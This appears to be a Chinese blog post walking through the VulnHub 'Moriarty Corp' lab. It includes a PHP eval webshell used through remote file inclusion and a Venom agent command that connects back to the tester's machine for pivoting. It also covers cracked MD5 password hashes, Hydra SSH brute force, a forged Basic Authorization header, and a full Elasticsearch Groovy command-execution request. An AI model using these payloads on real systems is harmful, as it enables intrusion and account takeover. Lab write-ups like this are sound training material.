vulnhub_内网渗透测试的记录——网络安全

主要考察知识点

        文件包含

        内网穿透

        命令上传

        弱口令

        更改权限

        HTTP协议Header

        ElasticSearch-CVE

        暴力破解

网络拓扑

写完之后把靶机的网络拓扑也做了一下



写在之前

这次用的虚拟机是VM_VirtualBox,第一次用,配置了许久,因为靶机是内网环境,所以有些网络配置需要手动调整



网络配置设置成如上,再次扫描IP,根据MAC地址就可以找到我们的靶机IP了。

靶机下载地址:

BoredHackerBlog: Moriarty Corp

渗透过程

IP发现

这里使用的windows的环境进行渗透测试,使用Advanced_IP_Scanner进行内网IP扫描



根据MAC地址发现IP,对获取到的IP进行端口扫描

端口扫描

这里使用的是御剑端口扫描器进行发现



发现存在8000端口和9000端口可疑端口,尝试进行WEB访问

WEB渗透

访问8000端口



是一个提交flag的页面,同时显示了我们的任务进度,首先根据提示提交第一个flag

再次显示新的提示


结合强大的百度翻译和谷歌翻译,大概明白了让我们从80端口开始渗透,然后在此提交flag,这个时候再次访问80端口



已经可以成功访问了,正式开始我们的渗透过程



根据url发现疑似存在文件包含漏洞,尝试读取一下敏感数据



成功读取/etc/passwd文件,我们构造一下查看能否远程包含webshell

首先在本地服务器构造webshell

<?phpeval($_REQUEST['pdsdt']);echo 'Welcome Hacker';

phpinfo();?>

尝试远程文件包含


成功包含远程文件,使用蚁剑链接webshell



找寻flag和下一步的信息

在根目录下发现flag文件



在8000页面进行提交,提交完毕之后再次给了我们提示



大概意思就是告诉我们网站的web服务已经没有什么有价值的信息了,下一步需要内网渗透,同时给了我们内网的网段,下一步就是转发流量进行内网渗透了

内网渗透-设置代理

设置内网代理,这里设置内网代理的方式有很多种,也可以使用MSF全程进行测试,因为为了方便,这里使用的是Venom&proxifier进行流量转发

首先上传agent服务端节点


在windows端启动admin程序监听

admin.exe-lport9999

在agent端修改程序权限为777,并执行命令

./agent_linux_x64-rhost192.168.1.101-rport9999



成功监听到数据

设置sock5代理



设置proxifier



尝试内网访问靶机



成功访问

下一步进行具体的内网漫游了

首先获取一下内网存活的靶机,根据题目提示的网段进行扫描



发现172.17.0.4的靶机存在web页面,尝试访问一下



发现是一个上传文件的点,同时需要我们输入密码才能成功上传,先burp抓包,跑一下常见的弱口令



抓到包了,尝试fuzz一下密码

当尝试弱口令password时,显示成功上传...



根据反馈的页面,尝试访问我们的webshell



代码执行成功,说明成功上传,蚁剑连接一下



再次找到一个flag文件,尝试在8000页面提交

页面再次给出了提示



大概的意思就是给了我们用户名和加密的密码,让破解这些hash加密的密码后尝试ssh登陆

username:roottooradminmcorpmoriarty

password:63a9f0ea7bb98050796b649e854818457b24afc8bc80e548d66c4e7ff72171c55f4dcc3b5aa765d61d8327deb882cf9921232f297a57a5a743894a0e4a801fc3084e0343a0486ff05530df6c705c8bb4697c6cc76fdbde5baccb7b3400391e308839cfc8a0f24eb155ae3f7f205f5cbc35ac704fe1cc7807c914af478f20fd35b27a803ed346fbbf6d2e2eb88df1c51b08552d48aa6d6d9c05dd67f1b4ba8747

同时提示我们密码需要暴力枚举,二话不说使用cmd5somd5,最后查询的结果:

hash值明文

63a9f0ea7bb98050796b649e85481845root

7b24afc8bc80e548d66c4e7ff72171c5toor

5f4dcc3b5aa765d61d8327deb882cf99password

21232f297a57a5a743894a0e4a801fc3admin

084e0343a0486ff05530df6c705c8bb4guest

697c6cc76fdbde5baccb7b3400391e30MORIARTY

8839cfc8a0f24eb155ae3f7f205f5cbcMCORP

35ac704fe1cc7807c914af478f20fd35mcorp

b27a803ed346fbbf6d2e2eb88df1c51bweapons

08552d48aa6d6d9c05dd67f1b4ba8747moriarty

再次扫描一下内网存在22端口的机子



发现172.17.0.5的SSH端口是开放的,根据获取到的信息构造字典,使用SSH爆破工具进行爆破(最后使用Hydra进行爆破成功的)



获取到密码为:

root/ weapons

使用xshell进行登陆



再次获取到flag

我们在8000端口进行提交,再次更新了提示



大概意思就是内网里面还有个聊天的程序,端口不在80让我们扫描一下他指定的几个端口,同时给了一个账户,让我们获取管理员用户的记录,先用指定的端口扫描一下网段



发现172.17.0.6的8000端口是开放的,尝试访问一下



提示我们需要登陆,根据刚才提示给我们的账户进行登陆

Hereare the credentials our agent has obtained from another source:username:buyer13password:arms13

登陆成功



发现网站有两个功能,查看聊天记录,修改密码,尝试访问修改密码页面,抓一下包,看看是否存在任意用户密码重置

修改用户名为admin



浏览数据包,发现在header头中存在问题



Authorization:Basic YnV5ZXIxMzphcm1zMTM=

解密一下



携带的是用户的姓名和密码,我们尝试构造一下管理员的身份并修改密码为admin

Authorization:Basic YWRtaW46YWRtaW4=

回到web页面,重新登陆,或者更改header头访问





成功登陆admin用户,访问chats



再次获取到flag,提交



我看了半天,这不是ES嘛,最近做项目正在用的东西,真是巧儿他妈给巧儿开门,巧儿到家了,扫描一下网段的9200端口



访问一下页面,标准的ES搜索页面



尝试一下ES的任意代码执行漏洞


构造数据包,创建一条数据

POST /mitian/mitian6/ HTTP/1.1Host: 172.17.0.7:9200Content-Length: 19Pragma: no-cacheCache-Control: no-cacheUpgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.97 Safari/537.36Origin: http://172.17.0.7:9200Content-Type: text/plainAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9Referer: http://172.17.0.7:9200/mitian/mitian6/Accept-Encoding: gzip, deflateAccept-Language: zh-CN,zh;q=0.9Connection: close{"name":"pdsdt"}


之后再search页面进行构造

POST/_search?prettyHTTP/1.1Host: 172.17.0.7:9200Content-Length: 156Pragma: no-cacheCache-Control: no-cacheUpgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.97 Safari/537.36Origin: http://172.17.0.7:9200Content-Type: text/plainAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9Referer: http://172.17.0.7:9200/mitian/mitian6/Accept-Encoding: gzip, deflateAccept-Language: zh-CN,zh;q=0.9Connection: close{"size":1, "script_fields": {"lupin":{"lang":"groovy","script": "java.lang.Math.class.forName(\"java.lang.Runtime\").getRuntime().exec(\"ls\").getText()"}}}



成功执行命令,读取一下flag



成功获取到flag文件,提交



显示任务完成,并将我们的IP加入了黑名单,真就卸磨杀驴

总结

这个靶机花了我大半天的时间,主要还是在网络配置上面的捯饬,内网的靶机每一个都不太难,重要的就是如何通过流量转发后正确的使用一些工具达到扫描端口爆破服务的目的,总体的收获还是挺大的,虽然和真实环境相比确实差别较大,但刚好最近就在用ES这方面的产品,也趁着这个机会对于ES的相关漏洞也加强了学习。

问题

有没有想学网络安全但又不知道该怎么入手的朋友啊?

我这里整理的大部分的学习资料,有需要没有

©著作权归作者所有,转载或内容合作请联系作者
  • 序言:七十年代末,一起剥皮案震惊了整个滨河市,随后出现的几起案子,更是在滨河造成了极大的恐慌,老刑警刘岩,带你破解...
    沈念sama阅读 200,527评论 5 470
  • 序言:滨河连续发生了三起死亡事件,死亡现场离奇诡异,居然都是意外死亡,警方通过查阅死者的电脑和手机,发现死者居然都...
    沈念sama阅读 84,314评论 2 377
  • 文/潘晓璐 我一进店门,熙熙楼的掌柜王于贵愁眉苦脸地迎上来,“玉大人,你说我怎么就摊上这事。” “怎么了?”我有些...
    开封第一讲书人阅读 147,535评论 0 332
  • 文/不坏的土叔 我叫张陵,是天一观的道长。 经常有香客问我,道长,这世上最难降的妖魔是什么? 我笑而不...
    开封第一讲书人阅读 54,006评论 1 272
  • 正文 为了忘掉前任,我火速办了婚礼,结果婚礼上,老公的妹妹穿的比我还像新娘。我一直安慰自己,他们只是感情好,可当我...
    茶点故事阅读 62,961评论 5 360
  • 文/花漫 我一把揭开白布。 她就那样静静地躺着,像睡着了一般。 火红的嫁衣衬着肌肤如雪。 梳的纹丝不乱的头发上,一...
    开封第一讲书人阅读 48,220评论 1 277
  • 那天,我揣着相机与录音,去河边找鬼。 笑死,一个胖子当着我的面吹牛,可吹牛的内容都是我干的。 我是一名探鬼主播,决...
    沈念sama阅读 37,664评论 3 392
  • 文/苍兰香墨 我猛地睁开眼,长吁一口气:“原来是场噩梦啊……” “哼!你这毒妇竟也来了?” 一声冷哼从身侧响起,我...
    开封第一讲书人阅读 36,351评论 0 254
  • 序言:老挝万荣一对情侣失踪,失踪者是张志新(化名)和其女友刘颖,没想到半个月后,有当地人在树林里发现了一具尸体,经...
    沈念sama阅读 40,481评论 1 294
  • 正文 独居荒郊野岭守林人离奇死亡,尸身上长有42处带血的脓包…… 初始之章·张勋 以下内容为张勋视角 年9月15日...
    茶点故事阅读 35,397评论 2 317
  • 正文 我和宋清朗相恋三年,在试婚纱的时候发现自己被绿了。 大学时的朋友给我发了我未婚夫和他白月光在一起吃饭的照片。...
    茶点故事阅读 37,443评论 1 329
  • 序言:一个原本活蹦乱跳的男人离奇死亡,死状恐怖,灵堂内的尸体忽然破棺而出,到底是诈尸还是另有隐情,我是刑警宁泽,带...
    沈念sama阅读 33,123评论 3 315
  • 正文 年R本政府宣布,位于F岛的核电站,受9级特大地震影响,放射性物质发生泄漏。R本人自食恶果不足惜,却给世界环境...
    茶点故事阅读 38,713评论 3 303
  • 文/蒙蒙 一、第九天 我趴在偏房一处隐蔽的房顶上张望。 院中可真热闹,春花似锦、人声如沸。这庄子的主人今日做“春日...
    开封第一讲书人阅读 29,801评论 0 19
  • 文/苍兰香墨 我抬头看了看天上的太阳。三九已至,却和暖如春,着一层夹袄步出监牢的瞬间,已是汗流浃背。 一阵脚步声响...
    开封第一讲书人阅读 31,010评论 1 255
  • 我被黑心中介骗来泰国打工, 没想到刚下飞机就差点儿被人妖公主榨干…… 1. 我叫王不留,地道东北人。 一个月前我还...
    沈念sama阅读 42,494评论 2 346
  • 正文 我出身青楼,却偏偏与公主长得像,于是被迫代替她去往敌国和亲。 传闻我的和亲对象是个残疾皇子,可洞房花烛夜当晚...
    茶点故事阅读 42,075评论 2 341

推荐阅读更多精彩内容